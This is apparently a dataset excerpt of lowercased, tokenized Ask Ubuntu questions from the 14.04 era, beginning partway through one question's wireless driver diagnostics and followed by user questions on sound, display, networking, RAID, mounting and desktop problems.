mac80211 # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/bluetooth/ath3k.ko firmware : ath3k-1.fw license : gpl version : 1.0 description : atheros ar30xx firmware driver author : atheros communications srcversion : 98a5245588c09e5e41690d0 alias : usb : v0489pe036d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe03cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe02cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3pe003d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p3121d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3402d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04c5p1330d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe04dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe056d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe04ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3393d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe057d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0930p0220d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0930p0219d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3pe005d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3pe004d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3362d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04cap3008d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04cap3006d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04cap3005d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04cap3004d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3375d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p817ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p311dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p3008d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p3004d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p0036d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v03f0p311dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe027d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0489pe03dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0930p0215d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3304d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3pe019d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p3002d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0cf3p3000d*dc*dsc*dp*ic*isc*ip*in* depends : bluetooth intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : baf225eeb618908380b28da alias : platform : qca955x_wmac alias : platform : ar934x_wmac alias : platform : ar933x_wmac alias : platform : ath9k alias : pci : v0000168cd00000036sv*sd*bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003027bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002810bc*sc*i* alias : pci : v0000168cd00000036sv0000144fsd00007202bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd00002130bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000612bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000652bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000642bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd0000302cbc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003027bc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411ebc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411dbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411cbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411bbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411abc*sc*i* alias : pci : v0000168cd00000036sv00001028sd0000020ebc*sc*i* alias : pci : v0000168cd00000036sv0000103csd0000217fbc*sc*i* alias : pci : v0000168cd00000036sv0000103csd000018e3bc*sc*i* alias : pci : v0000168cd00000036sv000017aasd00003026bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd0000213abc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000662bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000672bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000622bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003028bc*sc*i* alias : pci : v0000168cd00000036sv0000105bsd0000e069bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd0000302bbc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003026bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003025bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002812bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002811bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00006671bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000632bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd0000a119bc*sc*i* alias : pci : v0000168cd00000036sv0000105bsd0000e068bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd00002176bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003028bc*sc*i* alias : pci : v0000168cd00000037sv*sd*bc*sc*i* alias : pci : v0000168cd00000034sv*sd*bc*sc*i* alias : pci : v0000168cd00000034sv000010cfsd00001783bc*sc*i* alias : pci : v0000168cd00000034sv000014cdsd00000064bc*sc*i* alias : pci : v0000168cd00000034sv000014cdsd00000063bc*sc*i* alias : pci : v0000168cd00000034sv0000103csd00001864bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006641bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006631bc*sc*i* alias : pci : v0000168cd00000034sv00001043sd0000850ebc*sc*i* alias : pci : v0000168cd00000034sv00001a3bsd00002110bc*sc*i* alias : pci : v0000168cd00000034sv00001969sd00000091bc*sc*i* alias : pci : v0000168cd00000034sv000017aasd00003214bc*sc*i* alias : pci : v0000168cd00000034sv0000168csd00003117bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006661bc*sc*i* alias : pci : v0000168cd00000034sv00001a3bsd00002116bc*sc*i* alias : pci : v0000168cd00000033sv*sd*bc*sc*i* alias : pci : v0000168cd00000032sv*sd*bc*sc*i* alias : pci : v0000168cd00000032sv00001043sd0000850dbc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00001c01bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00001c00bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001f95bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001195bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001f86bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001186bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00002001bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00002000bc*sc*i* alias : pci : v0000168cd00000032sv0000144fsd00007197bc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e04fbc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e04ebc*sc*i* alias : pci : v0000168cd00000032sv000011adsd00006628bc*sc*i* alias : pci : v0000168cd00000032sv000011adsd00006627bc*sc*i* alias : pci : v0000168cd00000032sv00001c56sd00004001bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002100bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002c97bc*sc*i* alias : pci : v0000168cd00000032sv000017aasd00003219bc*sc*i* alias : pci : v0000168cd00000032sv000017aasd00003218bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c708bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c680bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c706bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410fbc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410ebc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410dbc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd00004106bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd00004105bc*sc*i* alias : pci : v0000168cd00000032sv0000185fsd00003027bc*sc*i* alias : pci : v0000168cd00000032sv0000185fsd00003119bc*sc*i* alias : pci : v0000168cd00000032sv0000168csd00003122bc*sc*i* alias : pci : v0000168cd00000032sv0000168csd00003119bc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e075bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002152bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd0000126abc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002126bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001237bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002086bc*sc*i* alias : pci : v0000168cd00000030sv*sd*bc*sc*i* alias : pci : v0000168cd0000002esv*sd*bc*sc*i* alias : pci : v0000168cd0000002dsv*sd*bc*sc*i* alias : pci : v0000168cd0000002csv*sd*bc*sc*i* alias : pci : v0000168cd0000002bsv*sd*bc*sc*i* alias : pci : v0000168cd0000002bsv00001a3bsd00002c37bc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd00001536bc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd0000147dbc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd0000147cbc*sc*i* alias : pci : v0000168cd0000002asv0000185fsd0000309dbc*sc*i* alias : pci : v0000168cd0000002asv00001a32sd00000306bc*sc*i* alias : pci : v0000168cd0000002asv000011adsd00006642bc*sc*i* alias : pci : v0000168cd0000002asv000011adsd00006632bc*sc*i* alias : pci : v0000168cd0000002asv0000105bsd0000e01fbc*sc*i* alias : pci : v0000168cd0000002asv00001a3bsd00001c71bc*sc*i* alias : pci : v0000168cd0000002asv*sd*bc*sc*i* alias : pci : v0000168cd00000029sv*sd*bc*sc*i* alias : pci : v0000168cd00000027sv*sd*bc*sc*i* alias : pci : v0000168cd00000024sv*sd*bc*sc*i* alias : pci : v0000168cd00000023sv*sd*bc*sc*i* depends : ath9k_hw , mac80211 , ath9k_common , cfg80211 , ath intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 parm : debug : debugging mask ( uint ) parm : nohwcrypt : disable hardware encryption ( int ) parm : blink : enable led blink on activity ( int ) parm : btcoex_enable : enable wifi-bt coexistence ( int ) parm : bt_ant_diversity : enable wlan/bt rx antenna diversity ( int ) parm : ps_enable : enable wlan powersave ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko license : dual bsd/gpl description : shared library for atheros wireless 802.11n lan cards . author : atheros communications srcversion : 696b00a6c59713ec0966997 depends : ath , ath9k_hw intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : 4809f3842a0542cd6b556d3 depends : ath intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath.ko license : dual bsd/gpl description : shared library for atheros wireless lan cards . author : atheros communications srcversion : 88a67c5359b02c5a710afcf depends : cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x1969:0x1090 ( alx ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x168c:0x0036 ( ath9k ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 1.707662 ] psmouse serio1 : elantech : assuming hardware version 3 ( with firmware version 0x450f03 ) [ 11.918852 ] ath : phy0 : wb335 1-ant card detected [ 11.918856 ] ath : phy0 : set bt/wlan rx diversity capability [ 11.926438 ] ath : phy0 : enable lna combining [ 11.928469 ] ath : phy0 : aspm enabled : 0x42 [ 11.928473 ] ath : eeprom regdomain : 0x65 [ 11.928475 ] ath : eeprom indicates we should expect a direct regpair map [ 11.928478 ] ath : country alpha2 being used : 00 [ 11.928479 ] ath : regpair used : 0x65 [ 14.066021 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready # # # # # # # # # # wireless info end # # # # # # # # # # # #
477226	sound indicator is missing	my sound indicator in the panel suddenly disappeared . my sound works perfectly accept that i have to run the following script to enable my built-in jbl sound in good quality . i do n't if it has anything to do with it ( and would be another question how to solve this issue , but it works for me ) i have to run this once when reboot/login to my system to get the sound to work in good quality . sound settings are all right . the only thing is that the indicator in the panel is missing . how can i get it back ? so here is the script i run everytime i start my system : # ! /bin/bash pulseaudio -k sudo modprobe -r snd-hda-intel sudo modprobe snd-hda-intel model=asus-model4 pulseaudio -- start i am using ubuntu 14.04 with unity .
477227	getting a black screen after instating pantheon	i just now installed pantheon desktop environment and it 's only showing a black screen . what do i do now ? how do i go back to unity ? after i logged out and chose unity i still get a black screen . please help !
477228	ca n't click on warning window , window not active	when i want to connect to a network using a certificate , and i do n't provide one , the network manager will open the following window for me . i would like to `` ignore '' , but i ca n't click on the popped-up window . the window below ( `` authentication required by wi-fi network '' ) remains active , and i can click anything there , e.g. , `` cancel '' . pressing the tab-key does n't to anything , and the alt+tab list just contains one entity `` network '' . any idea what is going wrong ? are there keyboard combinations that get me to the warning window ?
477232	force ntpd to have offset from time server	is it possible to force ntpd to have a fixed time offset , e.g . 10 minutes , to another server ? to be able to test that our devices do nicely sync with a single ntp source , we would like enable/disable the server with offset as a source and see the device adapt its time accordingly .
477236	mounting a remote folder using cifs	my university allows me to connect to my school folder using mount and this is what they suggest i should add to my fstab file : //servername/uni-user /home/myusername/sharedfolder smbfs noauto , username=uni-user , user , rw 0 0 and because smbfs is not available anymore at ubuntu 14.04 , i 've installed cifs-utils and changed the fstab line to be as following : //servername/uni-user /home/myusername/sharedfolder cifs noauto , username=uni-user , user , rw 0 0 now when i write mount folder , it says timeout error . my question is , is there anything else i should change in the fstab line other than the name of the mounting utility ? are the parameters at the end of the line still relevant between smbfs and cifs ? i 've tried mounting using the command : /home/myusername/sharedfolder
477237	ubuntu 14.04 nautilus icons size	after upgrading to ubuntu 14.04 from 13.10 , i tried a bit of tweaks . not sure which tweak was responsible but now i have nautilus icons that are very small . though in the preferences the icons size is set to 100 % still the icons appear very small . what can i do to restore them to their proper size ? though i have a strong feeling that the setting under display : `` scale all window contents to match '' might be the cause but even now when i have set it to `` display with largest controls '' , there 's no difference .
477240	debconf hanged on 13.04 to 13.10 upgrade path to tahr	i was notified of a difference in /etc/default/grub , so i clicked `` run a shell to examine the situation '' . but the debconf windows turned dimmed and no terminal opened . what can i do ? i 'm stuck there , seeing this in a manually launched terminal : ps ax |grep debconf 23598 pts/1 s 0:02 /usr/bin/perl -w /usr/share/debconf/frontend /var/lib/dpkg/info/grub-pc.postinst configure 2.00-13ubuntu3 23642 pts/1 s 0:00 /bin/bash /usr/bin/ucf -- three-way -- debconf-ok -- sum-file=/usr/share/grub/default/grub.md5sum /tmp/grub.6gkakqnvbb /etc/default/grub can i [ sudo ] kill 23642 or rather 23598 ? thanks for help
477241	install ubuntu 14.04 lts dell inspiron 5537	i am trying to install ubuntu 14.04 on dell inspiron 5537 , the install success with no errors , but when i boot to ubuntu i keep getting a popup window saying : the system is running in low-graphics mode ... device settings could not detected correctly . this model certified by ubuntu ! when i choose re-configure , i keep getting the same window ! when i press esc , i move to black screen , and nothing will happen ! any ideas ? http : //i.stack.imgur.com/hkasx.jpg
477242	how to rebuild mdraid metadata ?	i somehow hot swapping a failed hard drive on ubuntu 14.04 lts server running mdraid raid1 array without marking the failed drive to fail and remove it via mdadm . i successfully add another drive on the fly and rebuild the raid1 array but mdadm detects it as disk number 2 as shown in /proc/mdstat as follows : md3 : active raid1 sdf1 [ 2 ] sde1 [ 0 ] 1757680448 blocks super 1.2 [ 2/2 ] [ uu ] how to rebuild mdraid metadata so that mdadm detects it as drive number 1 ? number major minor raiddevice state 0 8 65 0 active sync /dev/sde1 2 8 81 1 active sync /dev/sdf1 thanks in advanced . : )
477247	ubuntu 12.04 stuck at boot splash screen	this has happened to me 3 times now , so it is definitely something i am doing . i 'm hoping someone else has seen this or knows what the problem is . first , i installed ubuntu 12.04 from the ubuntu-12.04.4-desktop-amd64.iso image downloaded directly from the ubuntu website . the md5 checksums of the install image match the md5 sums on the website : mbpr15 : source awt $ md5 ubuntu-12.04.4-desktop-amd64.iso md5 ( ubuntu-12.04.4-desktop-amd64.iso ) = c7f439e864d28d9e5ca2aa885c4ec4cb next , i followed the steps on google 's android open source project ( aosp ) to prepare your linux system for android builds . specifically , the steps relevant to linux were : $ sudo apt-get update $ sudo apt-get install openjdk-7-jdk $ sudo apt-get install git gnupg flex bison gperf build-essential \ zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev \ libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 \ libgl1-mesa-dev g++-multilib mingw32 tofrodos \ python-markdown libxml2-utils xsltproc zlib1g-dev : i386 $ ulimit -s -n 1024 then i do the checkout and build and everything works perfectly as long as i do n't shut down . once i do a shutdown , this thing will not boot . it gets stuck at this screen : and it will sit here forever . it does n't seem to take any input at all ( esc , alt-f1 , ctrl-alt-f1 , etc ... ) and the progress indicator has stopped . has anyone seen this or know what 's causing it to hang here ? i can boot to a live cd and access my filesystem , make a backup of my files , and reinstall . but as soon as i shut down , this happens again .
477249	lenovo g580 battery charge control	my laptop lenovo g580 ( not thinkpad ) has a battery threshold control software by the manufacturer for windows . i would like to know whether any application is available to control battery threshold for ubuntu 13.04 .
477254	error connecting to server in nemo	nemo 2.2.2 running on ubuntu 14.04 . when i try to connect to a server through ssh i am getting the following error : the name :1.322 was not provided by any .service files i have no problems connecting to the same server through the terminal or using nautilus . any ideas how to fix or debug this issue ?
477255	how to avoid messages from applications which i ran with a & ?	i ran dolphin like this : dolphin . & i see messages in the console like these : qpixmap : :scaled : pixmap is a null pixmap how can i keep the console clean or silent ?
477260	ubuntu server 14.04 apache 2.4 tlsv1.2/tlsv1.1 support	recently i upgraded my server from ubuntu server 12.04 to ubuntu server 14.04 by means of a new installation from scratch . only one problem remains . in 12.04 apache 2.2 with mod_ssl supported tls version 1 , 1.1 and 1.2 . after upgrading to 14.04 and apache 2.4 , apache only supports tls version 1 , support for 1.1 and 1.2 is missing . i followed both the migration guide for 2.2 - > 2.4 ( no changes to the mod_ssl settings ) as well as the documentation of mod_ssl regarding the sslprotocol configuration option . both sslprotocol tlsv1.2 tlsv1.1 tlsv1 and sslprotocol tlsv1.2 do not work . is there any way to convince apache to support the new tls versions as well ? problem seems to be solved now without any change from my side . apparently libssl was initially compiled without tlsv1.1/tlsv1.2 support .
477267	edubuntu boot problem on dual boot pc	when booting edubuntu on a dual boot pc with windows 7 , the last message that i get is `` restoring resolver state '' [ ok ] . i then press the enter key , some other messages come up and go away too quickly to notice what they say , and then the system shuts down . windows 7 works fine . my system is an older dell inspiron 9400 laptop with 3gb usable memory . this all started happening after attempting to upgrade to the next version of edubuntu , but was not allowed to because i did n't have enough space in my partition to allow for it . i 'm unsure whether that has anything to do with the problem .
477268	preventing pop-up dialogs when connecting an mtp device	i 'm using lubuntu 14.04 with a samsung galaxy s3 running android 4.3 . each time i connect my phone via usb , i get the following dialog : unable to open mtp device ' [ usb:002,023 ] ' a few moments later , i get the `` removable medium is inserted '' dialog , prompting me to open in file manager . after that , the phone is connected and fully accessible . so mtp works . the problem is that i plug in my phone to charge every time i sit down , and unplug it every time i step away . dismissing these two dialogs every time is a pain . i would think the `` removable medium '' dialog is the easier candidate . how do i tell ubuntu to take no action and stop prompting me ? for the mtp error , all the discussion i can find is for people who ca n't get mtp working at all . for me , it 's working , but only after throwing this initial error . i 've verified that my device is present in /lib/udev/rules.d/69-libmtp.rules
477271	how to solve 404 for static files with django and nginx ?	i setup a trusty vm with django + nginx ( other stuffs too ) . the server is working , i get the `` welcome to django '' page . but when i enter to servername/admin it loads the html page but fails to load the static content . and the admin page have this links to static content : < link rel= '' stylesheet '' type= '' text/css '' href= '' /static/admin/css/base.css '' / > < link rel= '' stylesheet '' type= '' text/css '' href= '' /static/admin/css/login.css '' / > both of the css files give me 404 , as the nginx log shows : 192.168.56.1 - - [ 05/jun/2014:12:04:09 -0300 ] `` get /admin http/1.1 '' 301 5 `` - '' `` mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:29.0 ) gecko/20100101 firefox/29.0 '' 192.168.56.1 - - [ 05/jun/2014:12:04:09 -0300 ] `` get /admin/ http/1.1 '' 200 833 `` - '' `` mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:29.0 ) gecko/20100101 firefox/29.0 '' 192.168.56.1 - - [ 05/jun/2014:12:04:10 -0300 ] `` get /static/admin/css/base.css http/1.1 '' 404 142 `` http : //ubuntu-server/admin/ '' `` mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:29.0 ) gecko/20100101 firefox/29.0 '' 192.168.56.1 - - [ 05/jun/2014:12:04:10 -0300 ] `` get /static/admin/css/login.css http/1.1 '' 404 142 `` http : //ubuntu-server/admin/ '' `` mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:29.0 ) gecko/20100101 firefox/29.0 '' i think that the error is on my nginx.conf file , but no idea how to solve it . this is the site tree : major files : urls.py , settings.py .
477274	how to debug kmail search after upgrade	i added kde backported packages recently to gain access to a more stable version of kdevelop . however , now , kontact/kmail 's search does n't work anymore . where do i start to find out what 's wrong ? the problem manifests itself that when in the inbox folder , i type something in the search bar , no emails will be shown . ( yes , searching for something where the email is definitely there . ) kubuntu 12.04 lts . kontact version 4.13 . the backport i have installed : http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu precise main what i tried . akonadiconsole as suggested here . but i could n't find a feeder as mentioned . more generally , is n't there a checklist or a general approach to debugging akonadi , nepomuk and kontact ?
477281	no such file but the file is there !	i 'm trying to compile a c++ file with some includes . my main file ( well i did n't make it hdf5_getters includes a file which includes the file hdf5.h , also not my design but it 's a downloaded library . every time i try to compile it i get the error message that the file hdf5.h does not exist while it clearly does . i started reading on the internet and people say it can happen because it 's a 32bit binary running on a 64bit architecture . but i 'm running a 32bit ubuntu so that ca n't be it ... i 'm out of ideas , if anyone can help me please : ) this is the errormessage with commands : make hdf5_getters g++ -c -wall -std=c++0x -o2 -c hdf5_getters.cc in file included from h5cpp.h:20:0 , from hdf5_getters.cc:34 : h5include.h:17:18 : fatal error : hdf5.h : no such file or directory # include < hdf5.h > ^ compilation terminated . make : *** [ hdf5_getters.o ] error 1
477286	how do i find out the email address associated with software centre ? ( 12.04 )	( currently on ubuntu 12.04 ) i 'm going to upgrade to ubuntu 14.04 and i have a lot of applications installed which i would like to retain when i upgrade to 14.04 . the thing is i do n't remember what email address i used to sign into software centre so i would n't know which email address to sign in with - to make reinstalling them a lot easier . i do n't use ubuntu one either so it wo n't be the same email as that . i would also like to know if i could change the email address of the software centre
477287	how to configure x - or make it recognize serial mouse ?	installation of 14.04 went ok with a usb mouse , but after that i attached a serial mouse to the single com port of my rig and ubuntu did not recognize it . being a newbie in linux i wandered by the forum and it seemed to me that with : 1- ctl+alt+f1 ; 2- login ; 3- sudo -s ; 4- sudo x -configure , would do the trick . but only got `` fatal server error : server is already active for display 0 - etc ... '' . any help will be mostly appreciated !
477290	can i convert a dmg file to iso in terminal ?	i use dmg2img to convert a dmg file . what package will convert a dmg 2 iso ?
477291	wifi has stopped working in ubuntu 14.04 desktop	usually wifi connects itself without problems when i boot my pc . earlier today my pc suddenly re-booted itself , as if there had been a momentary power-cut , but i did not notice my lights flicker , and my radio-alarm clock did not re-set itself . since then i have not been able to connect to wifi , so i wonder if something got corrupted . my ubuntu laptop and android tablet both connect via wifi , and i can connect the pc fine with an ethernet cable ; so the problem is not my router . i 've tried following various online toubleshooting guides without success . can any kind soul lead me through the diagnostic process to find the problem ? lshw produces this : *-network description : wireless interface physical id : 1 bus info : usb @ 2:1.5 logical name : wlan0 serial : 00:0d:81 : a2:5e:8f capabilities : ethernet physical wireless configuration : broadcast=yes driver=r8712u multicast=yes wireless=unassociated iwconfig gives this : wlan0 unassociated nickname : '' rtl_wifi '' mode : managed access point : not-associated sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . lsusb includes this line : bus 002 device 003 : id 0bda:8172 realtek semiconductor corp. rtl8191su 802.11n wlan adapter let me know what other info you need . thanks .
477293	upgraded from 13.04 software properties-gtk need apt line for 14.04 lts repository	i upgraded from 13.04 to 14.04 with downloaded updates no cd . it looks like i now need the apt line for update repositories for 14.04 lts . this is what is says when i try to update/reload information about installed software . and i do have a working internet connection . the information about available software is out-of-date to install software and updates from newly added or changed sources , you have to reload the information about available software . you need a working internet connection to continue . w : failed to fetch cdrom : //ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) /dists/raring/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . enter the complete apt line of the repository that you want to add as source . the apt line includes the type , location and components of a repository , for example 'deb http : //archive.ubuntu.com/ubuntu trusty main'
477295	how to set permanent ip address from script	like this post states i can edit the file to have some ip address configuration . is it possible to have some command line utility . which does it for me ? like : sudo configutilcommand -mode static -ip 192.168.7.2 -mask 255.255.255.0 ... .. or something like this , so i wont need it to edit file . p.s . configutilcommand is a hypothetical my invented stuff for example purpose .
477297	unity does n't load , no dasher but can see desktop icons and home ubuntu 13.10	i am using ubuntu 13.10 since 8-9 months and i had never faced problem as such . yesterday i installed some regular updates of ubuntu 13.10 ..everything was working fine but this morning when i started my laptop , i was not able to see unity nor dasher . i followed all the steps mentioned in this link . unity does n't load , no launcher , no dash appears . but no luck . i can see my desktop icons . i installed compiz settling manager and when i go and enable unity plugin , screen blinks as it 's loading something but nothing turns up . ( unity is already installed , ccsm is also already installed and unity plugin is enabled ) this didnt work i tried other thins like . sudo dconf reset -f /org/compiz/ setsid unity rm -rf ~/.compiz-1 ~/.config/compiz-1 and also deleted .xautority i also installed sudo apt-get install -- reinstall unity ubuntu-desktop dconf reset -f /org/compiz/ & & unity -- reset-icons & disown but nothing seems to work .
477300	how do i tell why it takes so long to boot up/login ?	i 'm running ubuntu 14.04 on a pretty new laptop , but it takes longer than i think it should ( since the laptop is quite new ) to start up and log in for the first time after booting . if i log out and log in again , it works in seconds , but starting up ( before the splash screen displays ) and logging in for the first time ( after it displays the desktop but before the ui and the desktop items appear ) take over 15 seconds each . it may or may not be important that i still use lightdm , but have swapped out gnome 3 instead of unity . below are links to my /var/log/dmesg and /var/log/boot.log . thanks for your help ! thomas /var/log/dmesg /var/log/boot.log
477301	how to sync motorola motog on ubuntu 13.10 using banshee	i recently bought a moto g , and want to sync music using banshee . i have mounted the phone to /media/mtpdevice using mtpfs -o allow_other /media/mtpdevice/ . the directory listing is $ ls /media/mtp device $ internal storage playlists however , banshee does n't detect it as an mtp device i.e . nothing shows up on the sidebar . how do i get moto g to sync with banshee ?
